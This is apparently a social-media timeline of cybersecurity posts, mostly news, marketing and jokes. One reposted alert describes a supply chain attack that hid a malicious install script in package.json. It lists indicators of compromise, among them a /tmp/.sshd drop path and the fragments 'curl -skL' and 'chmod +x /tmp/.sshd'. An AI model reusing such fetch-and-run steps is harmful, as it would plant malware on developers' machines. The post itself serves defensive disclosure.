Luke Stephens (hakluke)

@sec_hub93028 🍪

Interviewer: How do attackers commonly bypass MFA? What's your response?

‼️🚨 BREAKING: Another supply chain attack. 700+ GitHub repositories flagged, including PHP and Node.js projects. The malicious script was planted across all of them. When a developer installs the package, the script silently downloads a Linux file from GitHub, hides it under the name /tmp/.sshd (so it looks like a normal system file), and runs it in the background. It also skips security checks on the download and hides any error messages. 8 PHP packages on Packagist (the main PHP code library) were confirmed infected. The attacker hid the script inside a JavaScript config file (package.json) instead of the PHP one (composer.json), so PHP developers reviewing their code would not notice it. The biggest risk is to devdojo/wave (6,400 stars) and devdojo/genesis (9,100 installs), both popular Laravel project templates. Developers who use these templates run the bad script the moment they install dependencies. The same payload was also dropped into GitHub Actions (automated build pipelines) under a fake step called "Dependency Cache Sync," meaning it could infect company build servers too. Packagist removed the bad packages, but the auto-updating versions (dev-main, dev-master, 3.x-dev) can quietly come back if the original repos stay infected. IOCs: GitHub account parikhpreyash4 repo systemd-network-helper-aa5c751f drop path /tmp/.sshd command fragments curl -skL and chmod +x /tmp/.sshd.

Let's solve the "Blind OS command injection with out-of-band interaction" lab together! Follow along here 👉 portswigger.net/web-security/o…

@flipper_net If you're willing to forego the London requirement, @hacker_content would slay this.

HIRING! Social Media Writer/Manager Responsibilities: - Publish content created by our creative team - Reply to comments - Share community content - Write text posts Requirements: - Experience in social media - Tech-savvy - Based in London Learn more: flipperdevices.com/jobs/?ashby_ji…

We're finally ready to talk about Flipper One — a project we've been grinding on for years and have rebuilt from scratch several times. Read blog post >> blog.flipper.net/flipper-one-we…

@feross You should absolutely use this as a testimonial

TeamPCP just did an interview where they were asked what defenders should do to stop supply chain attacks. Their advice: pin versions to a specific hash, use least-privilege tokens, restrict IDE extensions. And then, verbatim: "The company Socket will detect the malware before the package even reaches your machine." So... thanks, I think? We're not putting this on the testimonials page. But at the same time, if you're not yet using @SocketSecurity to protect your supply chain, what are you waiting for?

🛑 If you're marketing a cybersecurity company - read this.  Imagine how many of your problems you could solve if there was a company that: 👉 Specialized in cybersecurity marketing specifically 👉 Had a team that was technical so that they could deeply understand your product 👉 Had worked with many of the largest companies in the world including Cisco, Google, Tenable, Semgrep, Wiz, Bugcrowd, HackerOne... 👉 Had designed and executed some of the most successful cybersecurity marketing campaigns ever 👉 Is currently managing a bunch of cybersecurity brand accounts and founder accounts on socials 👉 Wanted to work with you Wouldn't that just be a dream? hackercontent.com

Major companies are getting pwned by browser extensions and npm packages, but they think deploying AI agents will go fine. Good luck, have fun.

@gray_chromatic lol

Founder life in Australia 🇦🇺😭

1/ We are sharing additional details regarding our investigation into unauthorized access to GitHub's internal repositories. Yesterday we detected and contained a compromise of an employee device involving a poisoned VS Code extension. We removed the malicious extension version, isolated the endpoint, and began incident response immediately.

Live from Code with Claude London: we're launching self-hosted sandboxes (public beta) and MCP tunnels (research preview) in Claude Managed Agents. Run agents inside your own perimeter, with your security controls applied by default.

Time to go from a CVE release to exploitation was 2+ years in 2018, now it's under 1 hour.

Cybersecurity marketers/founders, don't be this guy

We are investigating unauthorized access to GitHub’s internal repositories. While we currently have no evidence of impact to customer information stored outside of GitHub’s internal repositories (such as our customers’ enterprises, organizations, and repositories), we are closely monitoring our infrastructure for follow-on activity.

If you are marketing a cybersecurity company, you need to watch this 👀

Let us handle the marketing for you.

Had a great chat with the founders of @Ethiack, @0xacb and @jbmonteiro about AI in offensive cybersecurity, Mythos, and all that good stuff. We did this for @Hacker0x01's "Exposed" video series. youtube.com/watch?v=SnnlZ3…

@mattjay I think everyone knows that the answer is "we're not"

😂